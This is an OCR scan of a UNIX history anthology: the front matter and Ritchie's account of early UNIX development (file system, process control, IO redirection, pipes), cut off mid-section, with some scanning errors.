UNIX® System Readings and Applications Volume II UNIX® System Readings and Applications Volume II The UNIX® System AT&T Bell Laboratories PRENTICE-HALL, INC., Englewood Cliffs, New Jersey 07632 ©1982 American Telephone and Telegraph Company ©1986 AT&T. This 1987 edition published by Prentice-Hall, Inc. A division of Simon & Schuster Englewood Cliffs, New Jersey 07632 UNIX® is a registered trademark of AT&T. The Publisher offers discounts on this book when ordered in bulk quantities. For more information write: Special Sales/College Marketing Prentice-Hall, Inc. College Technical and Reference Division Englewood Cliffs, New Jersey 07632 The author and publisher of this book have used their best efforts in preparing this book. These efforts include the development, research, and testing of the theories and pro- grams to determine their effectiveness. The author and publisher make no warranty of any kind, expressed or implied, with regard to these programs or the documentation con- tained in this book. The author and publisher shall not be liable in any event for inciden- tal or consequential damages in connection with, or arising out of, the furnishing, per- formance, or use of these programs. All rights reserved. No part of this book may be reproduced, in any form or by any means, without permission in writing from the publisher. Printed in the United States of America. 10 987654321 ISBN Q-13- c l3T645-7 OES Prentice-Hall International (UK) Limited, London Prentice-Hall of Australia Pty. Limited, Sydney Prentice-Hall Canada Inc., Toronto Prentice-Hall Hispanoamericana, S.A., Mexico Prentice-Hall of India Private Limited, New Delhi Prentice-Hall of Japan, Inc., Tokyo Prentice-Hall of Southeast Asia Pte. Ltd., Singapore Editora Prentice-Hall do Brasil, Ltda., Rio de Janeiro <2A ?b - 7b » 0b3 USS3 nab V0L3 Contents Preface vii R. L. Martin Foreword ix A. V. Aho The Evolution of the UNIX Time-sharing System 1 D. M. Ritchie Program Design in the UNIX System Environment 18 R. Pike and B. W. Kernighan The Blit: A Multiplexed Graphics Terminal 29 R. Pike Debugging C Programs With The Blit 54 T. Cargill UNIX Operating System Security 69 F. T. Grampp and R. H. Morris File Security and the UNIX System Crypt Command 93 J. A. Reeds and P. J. Weinberger The Evolution of C — Past and Future 104 L. Rosier V 283054 119 Data Abstraction in C B. Stroustrup Multiprocessor UNIX Systems 151 M. J. Bach and S. J. Buroff A UNIX System Implementation for System/370 168 W. A. Felton, G. L. Miller, and J. M. Milner UNIX Operating System Porting Experiences 185 D. E. Bodenstab, T. F. Houghton, K. A. Kelleman, G. Ronkin, and E. P. Schan The Evolution of UNIX System Performance 207 J. Feder Cheap Dynamic Instruction Counting 231 P. J. Weinberger Theory and Practice in the Construction of a Working Sort Routine 243 J. P. Linderman The Fair Share Scheduler 260 G. J. Henry The Virtual Protocol Machine 273 M. J. Fitton, C. J. Harkness, K. A. Kelleman, P. F. Long, and C. Mee III A Network of Computers Running the UNIX System 291 T. E. Fritz, J. E. Hefner, and T. M. Raleigh A Stream Input-Output System 311 D. M. Ritchie AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: Preface By R. L. MARTIN* (Manuscript received July 3, 1984) Major technological breakthroughs, like the transistor, are rare events. These breakthroughs have far-reaching effects on science, business, and, at times, society. The UNIX ™ operating system is such a breakthrough. This breakthrough is reflected in its rapid and continuing academic spread and acclaim, as well as its exploding commercial usage. The UNIX operating system presently is used at 1400 universities and colleges around the world. It is the basis for 70 computer lines covering the microcomputer to supercomputer spectrum; there are on the order of 100,000 UNIX systems now in operation, and approximately 100 companies are developing applications based on it. The 1983 Turing Award was presented to Thompson and Ritchie for their invention. The importance of the UNIX system to AT&T and AT&T’s support of it continue to grow. In his preface to the UNIX Time-Sharing System 1 issue of the Journal , T. H. Crowley observed that “the orig- inal design of the UNIX system was an elegant piece of work done in the research area, and that design has proven useful in many appli- cations.” In AT&T that observation is even truer now than it was in 1978. The UNIX operating system is the backbone development environment for AT&T and is now being used on hundreds of projects * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. VII by thousands of programmers. The recently announced AT&T 3B family of 32-bit computers is based on UNIX System V. This Computing Science and Systems issue of the Journal demon- strates two key points. First, the intellectual foundations laid by Thompson and Ritchie are firm footings for continued innovation and advances in computer science. Second, even though the UNIX system is already widely accepted, it is continuously being improved by the company that invented it. REFERENCE 1. T. H. Crowley, “The UNIX Time-Sharing System: Preface,” B.S.T.J., 57, No. 6, Part 2 (July- August 1978), pp. 1897-8. AUTHOR Robert L. Martin, B.S. (Electrical Engineering), 1964, Brown University; M.S. (Electrical Engineering) and D.S. (Computer Science), The Massachu- setts Institute of Technology in 1965 and 1967, respectively; AT&T Bell Laboratories, 1967 — . Mr. Martin became Head of the Loop Maintenance Operations System department in 1972, Director of the Loop Maintenance Systems Laboratory in 1978, and Director of the Assignment Systems Design Laboratory in 1979. In 1981 he became Executive Director of the Customer Network Operations division. He assumed his present position as Executive Director of the Computer Systems Software division in 1983. Mr. Martin is responsible for UNIX system development. He holds two patents and is the author of numerous technical articles and a textbook. Member, Tau Beta Pi, Sigma Xi. viii TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: Foreword By A. V. AHO* (Manuscript received June 28, 1984) This is the second issue of the Technical Journal devoted exclusively to papers on the family of computer operating systems bearing the UNIX trademark of AT&T Bell Laboratories. The UNIX operating system was created in 1969 by K. Thompson and D. M. Ritchie. Its growth since then, in both the commercial world and the research community, has been truly remarkable. In the commercial world there are 100,000 UNIX systems in oper- ation, and many hundreds of thousands of programmers who have studied the system’s commands and its implementation language C. In the research community, dozens of books and thousands of papers have been written about it, and in 1983 Thompson and Ritchie earned the Turing Award for its invention. Virtually every major university throughout the world now uses the UNIX system. UNIX is an evolving system. In the Computing Science Research Center at AT&T Bell Laboratories, where it was invented, the system has developed in a series of releases called “editions” or “versions”. The paper by Ritchie in this issue describes the birth of the system in this research environment. UNIX System V is available to the com- mercial world from AT&T in a fully supported form. Not only has the system provided the computing community a * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information -service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. ix programming environment of unusual simplicity, power, and elegance, it also has fostered a distinctive approach to software design: a problem is attacked by interconnecting a few simple parts, often created by software tools taken off the shelf. This approach to solving software problems is eloquently described in this issue in the paper by Pike and Kernighan. The remaining papers in this issue of the Technical Journal repre- sent a small sampling of ongoing system-related research and devel- opment work at AT&T Bell Laboratories. The papers cover many topics of current concern to the software community. I. AN INTELLIGENT TERMINAL In the first of these remaining papers, Pike describes the software architecture of a programmable bitmap graphics terminal called the Blit, which has evolved into the Teletype® Model 5620 terminal. The terminal and its software were designed specifically to interface with the UNIX system. The terminal allows programmers to interact with a machine in a natural, visual way. As an important case in point, Cargill describes an innovative, mouse-oriented facility for debugging C programs using the terminal. II. COMPUTER SECURITY The next two papers address computer security, a subject of consid- erable importance. The first paper, by Grampp and Morris, discusses administrative steps to improve system security. In the second paper Reeds and Weinberger present some of the analytic measures and countermeasures that have gone into the development of the encryp- tion command on the UNIX system. III. THE C PROGRAMMING LANGUAGE In the early 1970’s Dennis Ritchie devised the programming lan- guage C to implement the system in a higher-level language. Since that time, C has become a major programming language in its own right. Rosier discusses the evolution of C and current efforts to standardize the language. Stroustrup has added SIMULA67-style classes to C to create a modern language, now known as C++, that supports abstract data types in a particularly efficient manner. IV. PORTABILITY Because the system was written in the machine-independent lan- guage C, it was possible to port the operating system from one machine x TECHNICAL JOURNAL, OCTOBER 1984 to another. Before 1977, the system ran only on the PDP-11* com- puters. In 1977 experiments demonstrated that the system was indeed portable. Since that time, it has been ported to dozens of different machines ranging from microprocessors to supercomputers. The pa- pers by Bach and Buroff, by Felton, Miller, and Milner, and by Bodenstab et al. describe experiences in porting the UNIX system to several different machines including the Intel 8086, the IBM 370, and multiprocessor architectures. V. PERFORMANCE The performance of the system and the software that runs on it is of great importance to both users and developers at AT&T Bell Laboratories. Feder talks about the continuing measures that have been taken to improve the performance of the system as a whole. Weinberger presents an effective tool that enables a user to monitor the performance of programs easily. Linderman talks about steps taken to improve the performance of an important utility program — the sort routine. Linderman's paper illustrates the interaction of theory and practice that has gone into the design and implementation of many UNIX system programs. Henry discusses improving perform- ance by changing the scheduler to allocate time more fairly to different classes of users. VI. NETWORKING The last three papers in this issue describe communications be- tween devices and networks of machines running the UNIX system. The paper by Fitton et al. discusses the design of a set of software tools to create portable data communications protocol programs. The paper by Fritz, Hefner, and Raleigh discusses a software environment that was implemented on a network of different machines all running the UNIX system. The final paper by Ritchie describes an elegant new stream input-output system that facilitates communication be- tween the UNIX system and terminals and networks. The papers in this issue are only a sampling of the broad range of continuing UNIX system work being done at AT&T Bell Laboratories. The system, C language, and the tools have been greeted with consid- erable enthusiasm and are used increasingly to solve complex software problems. The system is stimulating new computer science research and in turn is benefiting from new advances in computer research. The UNIX system approach to software design is influencing a new * Trademark of Digital Equipment Corporation. FOREWORD XI generation of programmers and system designers. The people at AT&T Bell Laboratories are proud to be at the forefront of this advance in computing. AUTHOR Alfred V. Aho, B.A.Sc. (Engineering Physics), 1963, University of Toronto; M.A., 1965, and Ph.D., 1967 (Electrical Engineering/Computer Science), Princeton University; AT&T Bell Laboratories, 1966 — . Mr. Aho is presently Head, Computing Principles Research department. His research interests include algorithms, compilers, database query languages, and computer science theory. He is a past president of ACM SIGACT and past chairman of the NSF Advisory Panel on Computer Science. XII FOREWORD AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: The Evolution of the UNIX Time-sharing System By D. M. RITCHIE* This paper presents a brief history of the early development of the UNIX™ operating system. It concentrates on the evolution of the file system, the process-control mechanism, and the idea of pipelined commands. Some atten- tion is paid to social conditions during the development of the system. This paper is reprinted from Lecture Notes on Computer Science, No. 79, Language Design and Programming Methodology , Springer- Verlag, 1980. I. INTRODUCTION During the past few years, the UNIX operating system has come into wide use, so wide that its very name has become a trademark of Bell Laboratories. Its important characteristics have become known to many people. It has suffered much rewriting and tinkering since the first publication describing it in 1974, 1 but few fundamental changes. However, UNIX was born in 1969 not 1974, and the account of its development makes a little-known and perhaps instructive story. This paper presents a technical and social history of the evolution of the system. II. ORIGINS For computer science at Bell Laboratories, the period 1968-1969 was somewhat unsettled. The main reason for this was the slow, though clearly inevitable, withdrawal of the Labs from the Multics project. To the Labs computing community as a whole, the problem was the increasing obviousness of the failure of Multics to deliver promptly any sort of usable system, let alone the panacea envisioned earlier. For much of this time, the Murray Hill Computer Center was * AT&T Bell Laboratories. 1 also running a costly GE 645 machine that inadequately simulated the GE 635. Another shake-up that occurred during this period was the organizational separation of computing services and computing re- search. From the point of view of the group that was to be most involved in the beginnings of UNIX (K. Thompson, Ritchie, M. D. Mcllroy, J. F. Ossanna), the decline and fall of Multics had a directly felt effect. We were among the last Bell Laboratories holdouts actually working on Multics, so we still felt some sort of stake in its success. More important, the convenient interactive computing service that Multics had promised to the entire community was in fact available to our limited group, at first under the CTSS system used to develop Multics, and later under Multics itself. Even though Multics could not then support many users, it could support us, albeit at exorbitant cost. We didn’t want to lose the pleasant niche we occupied, because no similar ones were available; even the time-sharing service that would later be offered under GE’s operating system did not exist. What we wanted to preserve was not just a good environment in which to do program- ming, but a system around which a fellowship could form. We knew from experience that the essence of communal computing, as supplied by remote-access, time-shared machines, is not just to type programs into a terminal instead of a keypunch, but to encourage close com- munication. Thus, during 1969, we began trying to find an alternative to Multics. The search took several forms. Throughout 1969 we (mainly Ossanna, Thompson, Ritchie) lobbied intensively for the purchase of a medium- scale machine for which we promised to write an operating system; the machines we suggested were the DEC PDP-10 computer and the SDS (later Xerox) Sigma 7. The effort was frustrating, because our proposals were never clearly and finally turned down, but yet were certainly never accepted. Several times it seemed we were very near success. The final blow to this effort came when we presented an exquisitely complicated proposal, designed to minimize financial out- lay, that involved some outright purchase, some third-party lease, and a plan to turn in a DEC KA-10 processor on the soon-to-be-announced and more capable KI-10. The proposal was rejected, and rumor soon had it that W. O. Baker (then vice-president of Research) had reacted to it with the comment ‘Bell Laboratories just doesn’t do business this way!’ Actually, it is perfectly obvious in retrospect (and should have been at the time) that we were asking the Labs to spend too much money on too few people with too vague a plan. Moreover, I am quite sure that at that time operating systems were not, for our management, an attractive area in which to support work. They were in the process of 2 TECHNICAL JOURNAL, OCTOBER 1984 extricating themselves not only from an operating system development effort that had failed, but from running the local Computation Center. Thus it may have seemed that buying a machine such as we suggested might lead on the one hand to yet another Multics, or on the other, if we produced something useful, to yet another Comp Center for them to be responsible for. Besides the financial agitations that took place in 1969, there was technical work also. Thompson, R. H. Canaday, and Ritchie developed, on blackboards and scribbled notes, the basic design of a file system that was later to become the heart of UNIX. Most of the design was Thompson’s, as was the impulse to think about file systems at all, but I believe I contributed the idea of device files. Thompson’s itch for creation of an operating system took several forms during this period; he also wrote (on Multics) a fairly detailed simulation of the perform- ance of the proposed file system design and of paging behavior of programs. In addition, he started work on a new operating system for the GE 645, going as far as writing an assembler for the machine and a rudimentary operating system kernel whose greatest achievement, so far as I remember, was to type a greeting message. The complexity of the machine was such that a mere message was already a fairly notable accomplishment, but when it became clear that the lifetime of the 645 at the Labs was measured in months, the work was dropped. Also during 1969, Thompson developed the game of ‘Space Travel.’ First written on Multics, then transliterated into Fortran for GECOS (the operating system for the GE, later Honeywell, 635), it was nothing less than a simulation of the movement of the major bodies of the Solar System, with the player guiding a ship here and there, observing the scenery, and attempting to land on the various planets and moons. The GECOS version was unsatisfactory in two important respects: first, the display of the state of the game was jerky and hard to control because one had to type commands at it, and second, a game cost about $75 for CPU time on the big computer. It did not take long, therefore, for Thompson to find a little-used PDP-7 computer with an excellent display processor; the whole system was used as a Graphic - II terminal. He and I rewrote Space Travel to run on this machine. The undertaking was more ambitious than it might seem; because we disdained all existing software, we had to write a floating-point arith- metic package, the pointwise specification of the graphic characters for the display, and a debugging subsystem that continuously displayed the contents of typed-in locations in a corner of the screen. All this was written in assembly language for a cross-assembler that ran under GECOS and produced paper tapes to be carried to the PDP-7. Space Travel, though it made a very attractive game, served mainly as an introduction to the clumsy technology of preparing programs for TIME-SHARING 3 the PDP-7. Soon Thompson began implementing the paper file system (perhaps ‘chalk file system’ would be more accurate) that had been designed earlier. A file system without a way to exercise it is a sterile proposition, so he proceeded to flesh it out with the other requirements for a working operating system, in particular the notion of processes. Then came a small set of user-level utilities: the means to copy, print, delete, and edit files, and of course a simple command interpreter (shell). Up to this time all the programs were written using GECOS and files were transferred to the PDP-7 on paper tape; but once an assembler was completed the system was able to support itself. Al- though it was not until well into 1970 that Brian Kernighan suggested the name ‘ UNIX ,’ in a somewhat treacherous pun on ‘Multics,’ the operating system we know today was born. III. THE PDP-7 UNIX FILE SYSTEM Structurally, the file system of PDP-7 UNIX was nearly identical to today’s. It had 1. An i-list: a linear array of i-nodes each describing a file. An i-node contained less than it does now, but the essential information was the same: the protection mode of the file, its type and size, and the list of physical blocks holding the contents. 2. Directories: a special kind of file containing a sequence of names and the associated i-number. 3. Special files describing devices. The device specification was not contained explicitly in the i-node, but was instead encoded in the number: specific i-numbers corresponded to specific files. The important file system calls were also present from the start. Read, write, open, creat (sic), close: with one very important exception, discussed below, they were similar to what one finds now. A minor difference was that the unit of 10 was the word, not the byte, because the PDP-7 was a word-addressed machine. In practice this meant merely that all programs dealing with character streams ignored null characters, because null was used to pad a file to an even number of characters. Another minor, occasionally annoying difference was the lack of erase and kill processing for terminals. Terminals, in effect, were always in raw mode. Only a few programs (notably the shell and the editor) bothered to implement erase-kill processing. In spite of its considerable similarity to the current file system, the PDP-7 file system was in one way remarkably different: there were no path names, and each file-name argument to the system was a simple name (without 7’) taken relative to the current directory. Links, in the usual UNIX sense, did exist. Together with an elaborate set of 4 TECHNICAL JOURNAL, OCTOBER 1984 conventions, they were the principal means by which the lack of path names became acceptable. The link call took the form link (dir, file , newname) where dir was a directory file in the current directory, file an existing entry in that directory, and newname the name of the link, which was added to the current directory. Because dir needed to be in the current directory, it is evident that today’s prohibition against links to direc- tories was not enforced; the PDP-7 UNIX file system had the shape of a general directed graph. So that every user did not need to maintain a link to all directories of interest, there existed a directory called dd that contained entries for the directory of each user. Thus, to make a link to file x in directory ken, I might do In dd ken ken In ken x x rm ken This scheme rendered subdirectories sufficiently hard to use as to make them unused in practice. Another important barrier was that there was no way to create a directory while the system was running; all were made during recreation of the file system from paper tape, so that directories were in effect a nonrenewable resource. The dd convention made the chdir command relatively conven- ient. It took multiple arguments, and switched the current directory to each named directory in turn. Thus chdir dd ken would move to directory ken. (Incidentally, chdir was spelled ch; why this was expanded when we went to the PDP-11 I don’t remem- ber.) The most serious inconvenience of the implementation of the file system, aside from the lack of path names, was the difficulty of changing its configuration; as mentioned, directories and special files were both made only when the disk was recreated. Installation of a new device was very painful, because the code for devices was spread widely throughout the system; for example there were several loops that visited each device in turn. Not surprisingly, there was no notion of mounting a removable disk pack, because the machine had only a single fixed-head disk. The operating system code that implemented this file system was a drastically simplified version of the present scheme. One important simplification followed from the fact that the system was not multi- TIME-SHARING 5 programmed; only one program was in memory at a time, and control was passed between processes only when an explicit swap took place. So, for example, there was an iget routine that made a named i-node available, but it left the i-node in a constant, static location rather than returning a pointer into a large table of active i-nodes. A precursor of the current buffering mechanism was present (with about 4 buffers) but there was essentially no overlap of disk 10 with computation. This was avoided not merely for simplicity. The disk attached to the PDP- 7 was fast for its time; it transferred one 18-bit word every 2 micro- seconds. On the other hand, the PDP-7 itself had a memory cycle time of 1 microsecond, and most instructions took 2 cycles (one for the instruction itself, one for the operand). However, indirectly addressed instructions required 3 cycles, and indirection was quite common, because the machine had no index registers. Finally, the DMA con- troller was unable to access memory during an instruction. The upshot was that the disk would incur overrun errors if any indirectly-ad- dressed instructions were executed while it was transferring. Thus control could not be returned to the user, nor in fact could general system code be executed, with the disk running. The interrupt routines for the clock and terminals, which needed to be runnable at all times, had to be coded in very strange fashion to avoid indirection. IV. PROCESS CONTROL By ‘process control/ I mean the mechanisms by which processes are created and used; today the system calls fork, exec, wait, and exit implement these mechanisms. Unlike the file system, which existed in nearly its present form from the earliest days, the process control scheme underwent considerable mutation after PDP-7 UNIX was already in use. (The introduction of path names in the PDP-11 system was certainly a considerable notational advance, but not a change in fundamental structure.) Today, the way in which commands are executed by the shell can be summarized as follows: 1. The shell reads a command line from the terminal. 2. It creates a child process by fork. 3. The child process uses exec to call in the command from a file. 4. Meanwhile, the parent shell uses wait to wait for the child (command) process to terminate by calling exit. 5. The parent shell goes back to step 1. Processes (independently executing entities) existed very early in PDP-7 UNIX . There were in fact precisely two of them, one for each of the two terminals attached to the machine. There was no fork, wait, or exec. There was an exit, but its meaning was rather different, as will be seen. The main loop of the shell went as follows. 6 TECHNICAL JOURNAL, OCTOBER 1984 1. The shell closed all its open files, then opened the terminal special file for standard input and output (file descriptors 0 and 1). 2. It read a command line from the terminal. 3. It linked to the file specifying the command, opened the file, and removed the link. Then it copied a small bootstrap program to the top of memory and jumped to it; this bootstrap program read in the file over the shell code, then jumped to the first location of the command (in effect an exec). 4. The command did its work, then terminated by calling exit. The exit call caused the system to read in a fresh copy of the shell over the terminated command, then to jump to its start (and thus in effect to go to step 1). The most interesting thing about this primitive implementation is the degree to which it anticipated themes developed more fully later. True, it could support neither background processes nor shell com- mand files (let alone pipes and filters); but 10 redirection (via ‘<’ and ‘>’) was soon there; it is discussed below. The implementation of redirection was quite straightforward; in step 3 above the shell just replaced its standard input or output with the appropriate file. Crucial to subsequent development was the implementation of the shell as a user-level program stored in a file, rather than a part of the operating system. The structure of this process control scheme, with one process per terminal, is similar to that of many interactive systems, for example CTSS, Multics, Honeywell TSS, and IBM TSS and TSO. In general such systems require special mechanisms to implement useful facilities such as detached computations and command files; UNIX at that stage didn’t bother to supply the special mechanisms. It also exhibited some irritating, idiosyncratic problems. For example, a newly recreated shell had to close all its open files both to get rid of any open files left by the command just executed and to rescind previous 10 redirection. Then it had to reopen the special file corresponding to its terminal, in order to read a new command line. There was no /dev directory (because no path names); moreover, the shell could retain no memory across commands, because it was reexecuted afresh after each com- mand. Thus a further file system convention was required: each directory had to contain an entry tty for a special file that referred to the terminal of the process that opened it. If by accident one changed into some directory that lacked this entry, the shell would loop hopelessly; about the only remedy was to reboot. (Sometimes the missing link could be made from the other terminal.) Process control in its modern form was designed and implemented within a couple of days. It is astonishing how easily it fitted into the existing system; at the same time it is easy to see how some of the TIME-SHARING 7 slightly unusual features of the design are present precisely because they represented small, easily-coded changes to what existed. A good example is the separation of the fork and exec functions. The most common model for the creation of new processes involves specifying a program for the process to execute; in UNIX , a forked process contin- ues to run the same program as its parent until it performs an explicit exec. The separation of the functions is certainly not unique to UNIX , and in fact it was present in the Berkeley time-sharing system, 2 which was well-known to Thompson. Still, it seems reasonable to suppose that it exists in UNIX , mainly because of the ease with which fork could be implemented without changing much else. The system already handled multiple (i.e. two) processes; there was a process table, and the processes were swapped between main memory and the disk. The initial implementation of fork required only 1. Expansion of the process table 2. Addition of a fork call that copied the current process to the disk swap area, using the already existing swap 10 primitives, and made some adjustments to the process table. In fact, the PDP-7’s fork call required precisely 27 lines of assembly code. Of course, other changes in the operating system and user programs were required, and some of them were rather interesting and unexpected. But a combined fork-exec would have been considerably more complicated, if only because exec as such did not exist; its function was already performed, using explicit 10, by the shell. The exit system call, which previously read in a new copy of the shell (actually a sort of automatic exec but without arguments), simplified considerably; in the new version a process only had to clean out its process table entry and give up control. Curiously, the primitives that became wait were considerably more general than the present scheme. A pair of primitives sent one-word messages between named processes: sine s ( piu r me s s aye ) (pid r message) = rmes( ) The target process of smes did not need to have any ancestral rela- tionship with the receiver, although the system provided no explicit mechanism for communicating process IDs except that fork returned to each of the parent and child the ID of its relative. Messages were not queued; a sender delayed until the receiver read the message. The message facility was used as follows: the parent shell, after creating a process to execute a command, sent a message to the new process by smes; when the command terminated (assuming it did not try to read any messages) the shell’s blocked smes call returned an error indication that the target process did not exist. Thus the shell’s 8 TECHNICAL JOURNAL, OCTOBER 1984 smes became, in effect, the equivalent of wait. A different protocol, which took advantage of more of the generality offered by messages, was used between the initialization program and the shells for each terminal. The initialization process, whose ID was understood to be 1, created a shell for each of the terminals, and then issued rmes; each shell, when it read the end of its input file, used smes to send a conventional ‘I am terminating’ message to the initial- ization process, which recreated a new shell process for that terminal. I can recall no other use of messages. This explains why the facility was replaced by the wait call of the present system, which is less general, but more directly applicable to the desired purpose. Possibly relevant also is the evident bug in the mechanism: if a command process attempted to use messages to communicate with other proc- esses, it would disrupt the shell’s synchronization. The shell depended on sending a message that was never received; if a command executed rmes, it would receive the shell’s phony message, and cause the shell to read another input line just as if the command had terminated. If a need for general messages had manifested itself, the bug would have been repaired. At any rate, the new process control scheme instantly rendered some very valuable features trivial to implement; for example, de- tached processes (with ‘&’) and recursive use of the shell as a com- mand. Most systems have to supply some sort of special ‘batch job submission’ facility and a special command interpreter for files distinct from the one used interactively. Although the multiple-process idea slipped in very easily indeed, there were some aftereffects that weren’t anticipated. The most mem- orable of these became evident soon after the new system came up and apparently worked. In the midst of our jubilation, it was discovered that the chdir (change current directory) command had stopped working. There was much reading of code and anxious introspection about how the addition of fork could have broken the chdir call. Finally the truth dawned; in the old system chdir was an ordinary command; it adjusted the current directory of the (unique) process attached to the terminal. Under the new system, the chdir command correctly changed the current directory of the process created to execute it, but this process promptly terminated and had no effect whatsoever on its parent shell! It was necessary to make chdir a special command, executed internally within the shell. It turns out that several command-like functions have the same property, for example login. Another mismatch between the system as it had been and the new process control scheme took longer to become evident. Originally, the read/write pointer associated with each open file was stored within TIME-SHARING 9 the process that opened the file. (This pointer indicates where in the file the next read or write will take place.) The problem with this organization became evident only when we tried to use command files. Suppose a simple command file contains is who and it is executed as follows: sh comf ile > output The sequence of events was 1. The main shell creates a new process, which opens outfile to receive the standard output and executes the shell recursively. 2. The new shell creates another process to execute is, which correctly writes on file output and then terminates. 3. Another process is created to execute the next command. How- ever, the 10 pointer for the output is copied from that of the shell, and it is still 0, because the shell has never written on its output, and 10 pointers are associated with processes. The effect is that the output of who overwrites and destroys the output of the preceding is com- mand. Solution of this problem required creation of a new system table to contain the 10 pointers of open files independently of the process in which they were opened. V. IO REDIRECTION The very convenient notation for 10 redirection, using the ‘>’ and ‘<’ characters, was not present from the very beginning of the PDP-7 UNIX system, but it did appear quite early. Like much else in UNIX, it was inspired by an idea from Multics. Multics has a rather general 10 redirection mechanism 3 embodying named 10 streams that can be dynamically redirected to various devices, files, and even through special stream-processing modules. Even in version of Multics we were familiar with a decade ago, there existed a command that switched subsequent output normally destined for the terminal to a file, and another command to reattach output to the terminal. Where under UNIX one might say Is > xx to get a listing of the names of one’s files in xx, on Multics the notation was 10 TECHNICAL JOURNAL, OCTOBER 1984 iocall attach user_output file xx list iocall attach user_output syn user_i/o Even though this very clumsy sequence was used often during the Multics days, and would have been utterly straightforward to integrate into the Multics shell, the idea did not occur to us or anyone else at the time. I speculate that the reason it did not was the sheer size of the Multics project: the implementors of the 10 system were at Bell Labs in Murray Hill, while the shell was done at MIT. We didn’t consider making changes to the shell (it was their program); corre- spondingly, the keepers of the shell may not even have known of the usefulness, albeit clumsiness, of iocall. (The 1969 Multics manual 4 lists iocall as an ‘author-maintained,’ that is non-standard, com- mand.) Because both the UNIX 10 system and its shell were under the exclusive control of Thompson, when the right idea finally sur- faced, it was a matter of an hour or so to implement it. VI. THE ADVENT OF THE PDP-11 By the beginning of 1970, PDP-7 UNIX was a going concern. Primitive by today’s standards, it was still capable of providing a more congenial programming environment than its alternatives. Neverthe- less, it was clear that the PDP-7, a machine we didn’t even own, was already obsolete, and its successors in the same line offered little of interest. In early 1970 we proposed acquisition of a PDP-11, which had just been introduced by Digital. In some sense, this proposal was merely the latest in the series of attempts that had been made throughout the preceding year. It differed in two important ways. First, the amount of money (about $65,000) was an order of magnitude less than what we had previously asked; second, the charter sought was not merely to write some (unspecified) operating system, but instead to create a system specifically designed for editing and for- matting text, what might today be called a ‘word-processing system.’ The impetus for the proposal came mainly from J. F. Ossanna, who was then and until the end of his life interested in text processing. If our early proposals were too vague, this one was perhaps too specific; at first it too met with disfavor. Before long, however, funds were obtained through the efforts of L. E. McMahon and an order for a PDP-11 was placed in May. The processor arrived at the end of the summer, but the PDP-11 was so new a product that no disk was available until December. In the meantime, a rudimentary, core-only version of UNIX was written using a cross-assembler on the PDP-7. Most of the time, the machine TIME-SHARING 11 sat in a corner, enumerating all the closed Knight's tours on a 6 X 8 chess board — a three-month job. VII. THE FIRST PDP-11 SYSTEM Once the disk arrived, the system was quickly completed. In internal structure, the first version of UNIX for the PDP-11 represented a relatively minor advance over the PDP-7 system; writing it was largely a matter of transliteration. For example, there was no multiprogram- ming; only one user program was present in core at any moment. On the other hand, there were important changes in the interface to the user: the present directory structure, with full path names, was in place, along with the modern form of exec and wait, and conveniences like character-erase and line-kill processing for terminals. Perhaps the most interesting thing about the enterprise was its small size: there were 24K bytes of core memory (16K for the system, 8K for user programs), and a disk with IK blocks (512K bytes). Files were limited to 64K bytes. At the time of the placement of the order for the PDP-11, it had seemed natural, or perhaps expedient, to promise a system dedicated to word processing. During the protracted arrival of the hardware, the increasing usefulness of PDP-7 UNIX made it appropriate to justify creating PDP-11 UNIX as a development tool, to be used in writing the more special-purpose system. By the spring of 1971, it was gener- ally agreed that no one had the slightest interest in scrapping UNIX . Therefore, we transliterated the roff text formatter into PDP-11 assembler language, starting from the PDP-7 version that had been transliterated from Mcllroy’s BCPL version on Multics, which had in turn been inspired by J. Saltzer’s runoff program on CTSS. In early summer, editor and formatter in hand, we felt prepared to fulfill our charter by offering to supply a text-processing service to our Patent department for preparing patent applications. At the time, they were evaluating a commercial system for this purpose; the main advantages we offered (besides the dubious one of taking part in an in-house experiment) were two in number: first, we supported Teletype’s model 37 terminals, which, with an extended type-box, could print most of the math symbols they required; second, we quickly endowed roff with the ability to produce line-numbered pages, which the Patent department required and which the other system could not handle. During the last half of 1971, we supported three typists from the Patent department, who spent the day busily typing, editing, and formatting patent applications, and meanwhile tried to carry on our own work. UNIX has a reputation for supplying interesting services on modest hardware, and this period may mark a high point in the "benefit/equipment ratio; on a machine with no memory protection 12 TECHNICAL JOURNAL, OCTOBER 1984 and a single 0.5-MB disk, every test of a new program required care and boldness, because it could easily crash the system, and every few hours’ work by the typists meant pushing out more information onto DECtape, because of the very small disk. The experiment was trying but successful. Not only did the Patent department adopt UNIX, and thus become the first of many groups at the Laboratories to ratify our work, but we achieved sufficient credibility to convince our own management to acquire one of the first PDP 11/45 systems made. We have accumulated much hardware since then, and labored continuously on the software, but because most of the interesting work has already been published (e.g., on the system itself 1,5,6 and the text processing applications 7,8,9 ), it seems unnecessary to repeat it here. VIII. PIPES One of the most widely admired contributions of UNIX to the culture of operating systems and command languages is the pipe, as used in a pipeline of commands. Of course, the fundamental idea was by no means new; the pipeline is merely a specific form of coroutine. Even the implementation was not unprecedented, although we didn’t know it at the time; the ‘communication files’ of the Dartmouth Time- Sharing System 10 did very nearly what UNIX pipes do, though they seem not to have been exploited so fully. Pipes appeared in UNIX in 1972, well after the PDP-11 version of the system was in operation, at the suggestion (or perhaps insistence) of M. D. Mcllroy, a long-time advocate of the non-hierarchical control flow that characterizes coroutines. Some years before pipes were implemented, he suggested that commands should be thought of as binary operators, whose left and right operand specified the input and output files. Thus a ‘copy’ utility would be commanded by inputf ile copy outputf ile To make a pipeline, command operators could be stacked up. Thus, to sort input, paginate it neatly, and print the result off-line, one would write input sort paginate offprint In today’s system, this would correspond to sort input | pr | opr The idea, explained one afternoon on a blackboard, intrigued us but failed to 